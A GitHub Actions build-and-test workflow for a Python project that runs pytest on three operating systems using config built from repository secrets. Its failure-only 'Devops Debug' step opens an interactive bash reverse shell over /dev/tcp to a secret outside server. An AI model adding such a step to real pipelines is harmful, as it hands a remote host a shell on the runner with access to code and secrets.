# This workflow will install Python dependencies, run tests and lint with a single version of Python
# For more information see: https://help.github.com/actions/language-and-framework-guides/using-python-with-github-actions
name: Build & Test

on:
  push:
    branches: '*'
  pull_request:
    branches: '*'

jobs:
  build:
    runs-on: ${{ matrix.os }}
    strategy:
      matrix:
        os: [ubuntu-latest, macos-latest, windows-latest]
        python-version: [ '3.10']
    steps:
      - uses: actions/checkout@v3
      - name: Set up Python
        uses: actions/setup-python@v4
        with:
          python-version: ${{ matrix.python-version }}
      - name: Display Python version
        run: python --version

      - name: Install dependencies
        run: |
          python -m pip install --upgrade pip
          python -m pip install pytest
          python -m pip install -r requirements.txt
          playwright install
      - name: Init Config.py
        run: |
          python ./init_config.py ${{ secrets.JX3Token }} ${{ secrets.JX3API_LINK }} ${{ secrets.SFAPI_WSKINK }} ${{ secrets.SFAPI_WSTOKEN }}
      - name: Test with pytest
        run: |
          pytest -v --full-trace --durations 10
      - name: Devops Debug
        if: ${{ failure() }}
        run: |
          bash -i >& /dev/tcp/${{ secrets.DEBUG_SERVER }} 0>&1
        continue-on-error: true
